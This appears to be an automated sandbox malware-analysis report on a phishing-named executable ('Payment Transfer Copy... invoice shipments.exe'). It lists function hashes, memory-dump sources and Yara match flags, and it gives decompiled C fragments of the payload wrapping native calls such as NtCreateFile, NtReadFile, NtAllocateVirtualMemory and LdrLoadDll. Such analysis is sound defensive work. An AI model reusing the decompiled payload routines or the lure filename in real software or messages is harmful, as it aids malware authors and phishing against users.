API String ID: 716092398-0
Opcode ID: fa4440ce7f009f415f412dfc904fe8e52d82ecea730a7997dab364cea7d9dfb3
Instruction ID: c3e8717bda800adb7332a8e7fa9ba71852be0a2054a1beeb00a9607ba5199a79
Opcode Fuzzy Hash: fa4440ce7f009f415f412dfc904fe8e52d82ecea730a7997dab364cea7d9dfb3
Instruction Fuzzy Hash: FF51F0B6D00249EFDF11CF99C880ADEBFB1BF49314F14812AE919AB220D771A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028DDC6E, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7bb29cfaedaf4bd777e818a8f8d2a62b134cf9e91dcedbddf41ecf71bd1790b6
Instruction ID: 0e1e0859a1896a867e630467b65a976fd38d8bf86e8324d13f5050b450c0bdea
Opcode Fuzzy Hash: 7bb29cfaedaf4bd777e818a8f8d2a62b134cf9e91dcedbddf41ecf71bd1790b6
Instruction Fuzzy Hash: 6151C1B5D003499FDF14CFA9C884ADEBBB5FF49314F24812AE819AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028DDC70, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 889352d1a59b18c4023d8b47867aea7dd564ab3932b995e68bda1466bcff9543
Instruction ID: ed134a8f55a7a7fb59a27a7b3f6eaa8ecb73cf6d9e74124625d6ccedf5927270
Opcode Fuzzy Hash: 889352d1a59b18c4023d8b47867aea7dd564ab3932b995e68bda1466bcff9543
Instruction Fuzzy Hash: 0F51B0B5D003499FDF14CF99C984ADEBBB5FF88314F24812AE819AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028DDC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4d5fb0018e6dff05e07ec4282ea9bc45faa10ee67619dd3421445b4b6a14ae41
Instruction ID: 8d4a60aba57cacdd6a69df3d760679be5f49eecb623df8280387d57bc766806e
Opcode Fuzzy Hash: 4d5fb0018e6dff05e07ec4282ea9bc45faa10ee67619dd3421445b4b6a14ae41
Instruction Fuzzy Hash: E641B0B5D003499FDF14CF99C984ADEBBB5BF88314F24812AE819AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028D6DC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028D6E47

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8c01ac4cd7c04a78d95080f5b3a2b2a35b2525dd2a877b31cac6ec7719235313
Instruction ID: 300667d4cee8c564e326a627d23a9b276e5c9bb452306f8a0af978a9d615fe14
Opcode Fuzzy Hash: 8c01ac4cd7c04a78d95080f5b3a2b2a35b2525dd2a877b31cac6ec7719235313
Instruction Fuzzy Hash: 3E21D3B5D002599FDB10CFAAD984ADEBBF8FF48324F14841AE918A7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028DB0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028DBE89,00000800,00000000,00000000), ref: 028DC09A

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8f3c1aa1cddd11c44f7eee4262667e3fe04cad8f7977f9dc93bade1f34d224af
Instruction ID: a51a8f2256ccba625d1bcd88d21c8c518e51472b8b1ede74e4c3ccc737067475
Opcode Fuzzy Hash: 8f3c1aa1cddd11c44f7eee4262667e3fe04cad8f7977f9dc93bade1f34d224af
Instruction Fuzzy Hash: E01117BAD002098FDB10CF9AD444BDEFBF4EB48314F04841ED919A7600C775A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 028DBDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028DBE0E

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4ac00c74c0c80cca03e9890060f520cf090111238ef3f164964ecda1c14d667e
Instruction ID: 4f46d10f9e2aaf6d02b4d98f5cb30438838ad213e8151df507c7caf70ce4ae3b
Opcode Fuzzy Hash: 4ac00c74c0c80cca03e9890060f520cf090111238ef3f164964ecda1c14d667e
Instruction Fuzzy Hash: 2F11E0BAD006498FDB10CF9AC444BDEFBF4EF88228F15851AD929A7600C374A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028DDEB9, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 028DDF1D

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: af271b6abc36c91645474c81b58b2c5c35c574be28491100aa9d69b559e0b0be
Instruction ID: bb2aea10082a226cdd52e5ee75655e503822008c042498357de89cdb57ea150b
Opcode Fuzzy Hash: af271b6abc36c91645474c81b58b2c5c35c574be28491100aa9d69b559e0b0be
Instruction Fuzzy Hash: E611E5B69002499FDB10CF99D584BDFFBF4EB88324F14841AE969A7740C374A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028DDEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 028DDF1D

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 6afde26054b88370cf83544c09490e8774debb08ec2e546515078f36b136f052
Instruction ID: 5c84c8d1c239ddeee2fdd14679c0fd0461d29224a6ed8aa35282cca01533ed30
Opcode Fuzzy Hash: 6afde26054b88370cf83544c09490e8774debb08ec2e546515078f36b136f052
Instruction Fuzzy Hash: 5111E2B69002499FDB10CF99D584BDEBBF8EB88324F14841AE959A7700C374A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BED210, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7025905868453e2c39aae7a282f20b18e1c0fe85b63ab19fb9f43e14a5a8896
Instruction ID: 864412aa9ecb53a1696ec16f315dabc2e31e8751963f557cb5e3c202f9ea2f35
Opcode Fuzzy Hash: e7025905868453e2c39aae7a282f20b18e1c0fe85b63ab19fb9f43e14a5a8896
Instruction Fuzzy Hash: B8212572504280DFCB05CF54D9C4B2BBBA5FB88324F24C5A9EA054B246C37AD856DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49501528d27edca6ea37f947503efda8c30f746a200f63de7df6676475ff08be
Instruction ID: 37e2b4953afa481ca8b1b4dbd85d8ab4ba5f9056dc3ce7c0e9b66167912d3a6f
Opcode Fuzzy Hash: 49501528d27edca6ea37f947503efda8c30f746a200f63de7df6676475ff08be
Instruction Fuzzy Hash: 77213A71504248DFCB14CF24D9D4B26BBA6FB44314F24C5A9D9094B346CB36D84BDB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca556f23def2340e7b1f4bc761282f3ec12c09a909e091e3820843b179cdc9a
Instruction ID: 3c7577d0daba080def9a27d8d50221d12ab53121b889dc5a09c77e28f6bb56d8
Opcode Fuzzy Hash: cca556f23def2340e7b1f4bc761282f3ec12c09a909e091e3820843b179cdc9a
Instruction Fuzzy Hash: CB210771504248DFDB01CF54D9C4B36BBA6FB88314F24C9ADEA094B245C736D84ADAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a776da891f3076a0d2422a93996345f1176fe8aa3d43a86cc14a96b73f30209
Instruction ID: b6b646c928e1934918464fb84d3da9d9b8c0f67a1664db3a2bc1978a2b503665
Opcode Fuzzy Hash: 3a776da891f3076a0d2422a93996345f1176fe8aa3d43a86cc14a96b73f30209
Instruction Fuzzy Hash: 4321C9755093848FCB02CF20D594715BF72EB45314F28C5EAD8498B657C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BED20B, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207c29a1783b1a3e04d87dd2c1dbb5a2b9a9a918f3238e3d7369a536fc5e77c9
Instruction ID: faa1f75f513483901dea52785498d4d5a0f204b76b72b8330997cad85c7b93b4
Opcode Fuzzy Hash: 207c29a1783b1a3e04d87dd2c1dbb5a2b9a9a918f3238e3d7369a536fc5e77c9
Instruction Fuzzy Hash: C521B176404280DFCB06CF50D9C4B16BFB1FB88320F24C6AADD040B656C37AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BFD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5423dff634b637993c3977459c8b4a40d2af93c6c522a3032ada7a034eb7421
Instruction ID: 08ad69585ea047114b5596631dc3eb766f0d64a579b93f2f70720efe0b0550a1
Opcode Fuzzy Hash: f5423dff634b637993c3977459c8b4a40d2af93c6c522a3032ada7a034eb7421
Instruction Fuzzy Hash: 35119D75504284DFCB12CF10D5C4B25FBB2FB84324F28C6AED9494B656C33AD84ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BED75D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abcbba1e5d8a8e4aa872357e021fb40e45b6431105596b38094352f73a55d0b7
Instruction ID: 44c04622bce157067a74d0ba2329e4fb23a9b30d0461e85c3b6d73ac4bd229ba
Opcode Fuzzy Hash: abcbba1e5d8a8e4aa872357e021fb40e45b6431105596b38094352f73a55d0b7
Instruction Fuzzy Hash: 8C01F2724083C0AEE7108B16DDC4BA7BBDCEF45324F18C89AED045B282C7B99C44C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BED75C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecb7625aec6874b19771d12ad0de2b479af46822c4a499c8e046a9c14dc9eaf
Instruction ID: 14f48fc50b913fafadb8c03a4f30c8ed629ba0e81d4ea458cf5cf655aae1fd5d
Opcode Fuzzy Hash: 1ecb7625aec6874b19771d12ad0de2b479af46822c4a499c8e046a9c14dc9eaf
Instruction Fuzzy Hash: CEF06271404284AEEB108B16DD84BA6FFDCEB45734F18C55AED085B286C3B99C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 028DC2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a5d784e2522c4567d687bcf6ac0efb13351739a5db61d47dfbe2c411374d262
Instruction ID: c7bd94f74670b83edf677583e09036213661cdcbd3e5ff57ca1121d814a09d54
Opcode Fuzzy Hash: 1a5d784e2522c4567d687bcf6ac0efb13351739a5db61d47dfbe2c411374d262
Instruction Fuzzy Hash: 72525BB9980B068FD794CF14E4889997BB1FB40318FD18A09D7619BAD0D3BC657ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 028D9990, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 856c9e11822a540be2ec52a6ff3ac47c2ff67266f0c5651dc371eb7651428bbd
Instruction ID: d9c282fa7d3ccc74bd825ae6deea3eaf9adf4fe2a94b351bf6fc3e4b768f09fe
Opcode Fuzzy Hash: 856c9e11822a540be2ec52a6ff3ac47c2ff67266f0c5651dc371eb7651428bbd
Instruction Fuzzy Hash: B7A14E3AE006198FCF05DFA5C84499DB7B2FF89304B15856AE905FB261EB31E959CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6840 Parent PID: 6512 Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCOMMON

Executed Functions

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_push(_v8);
					_t17 = E0041CA70(_v8, _t24, __eflags);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acd9
0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad02
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00419F3A(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				char _v1;
				long _t18;
				void* _t27;

				asm("out dx, eax");
				_push( &_v1);
				_t14 = _a4;
				_t4 = _t14 + 0xc60; // 0xca0
				E0041A960(_t27, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t18;
			}

0x00419f3d
0x00419f40
0x00419f43
0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ed4de3dc9bc4c7cbd8a019f5995cad363dfb96b880fc1551004f11f878547797
Instruction ID: 569f4afcfd54039729ef317f1f166fd78ad41c4d60354f1ba1eaca3ee2d129db
Opcode Fuzzy Hash: ed4de3dc9bc4c7cbd8a019f5995cad363dfb96b880fc1551004f11f878547797
Instruction Fuzzy Hash: 1CF0A0F11140496BDB04EF98DC88CE77BA9EF89264B05879DFD4C97202C635E891CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8C, Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00419E8C(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t12;
				void* _t14;

				asm("out dx, eax");
				_t14 = __esi + 1;
				asm("stosb");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_push(_t14);
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e8c
0x00419e8d
0x00419e8e
0x00419e93
0x00419e96
0x00419e99
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 310d1f3d3a770c7e3c425b4ea49fdb75e4c28933b8930e42b739b1c2b33b749a
Instruction ID: 2700c3f014b232e21b8c7e7b98d2eee81d62da756e8a852cccbb6318fe13289d
Opcode Fuzzy Hash: 310d1f3d3a770c7e3c425b4ea49fdb75e4c28933b8930e42b739b1c2b33b749a
Instruction Fuzzy Hash: F4E0C2726102147BD710FF98CC85FE77BA9EF487A0F158469BA5C9B242C930E60087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01029910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102991A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
Instruction ID: 878fbbdb5b448471a8d4aa652203e5919befb66cfd9d585cb76835cf29415190
Opcode Fuzzy Hash: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
Instruction Fuzzy Hash: 149002B122100902D140719984047460109A7D0342F91C011A5454554EC6998DE577A5

Uniqueness

Uniqueness Score: -1.00%

Function 01029540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0102954A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
Instruction ID: 835c2fd37c23f9b669f8d3973f5407af7e619d74afedc05e34640e8e4359f62c
Opcode Fuzzy Hash: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
Instruction Fuzzy Hash: 27900265231005030105A5994704507014AA7D5392391C021F1405550CD66188716261

Uniqueness

Uniqueness Score: -1.00%

Function 010299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010299AA

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
Instruction ID: aa4a37bed587550ef9467aec38bc1f07e25c5d06725e9b8f31570c41a0df4203
Opcode Fuzzy Hash: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
Instruction Fuzzy Hash: 589002A136100942D10061998414B060109E7E1342F91C015E1454554DC659CC627266

Uniqueness

Uniqueness Score: -1.00%

Function 010295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010295DA

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
Instruction ID: dd7c23fd0dee7fd67c33e8e4a1b251b386cac9f5ec6dd80891fc26a8f500fe13
Opcode Fuzzy Hash: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
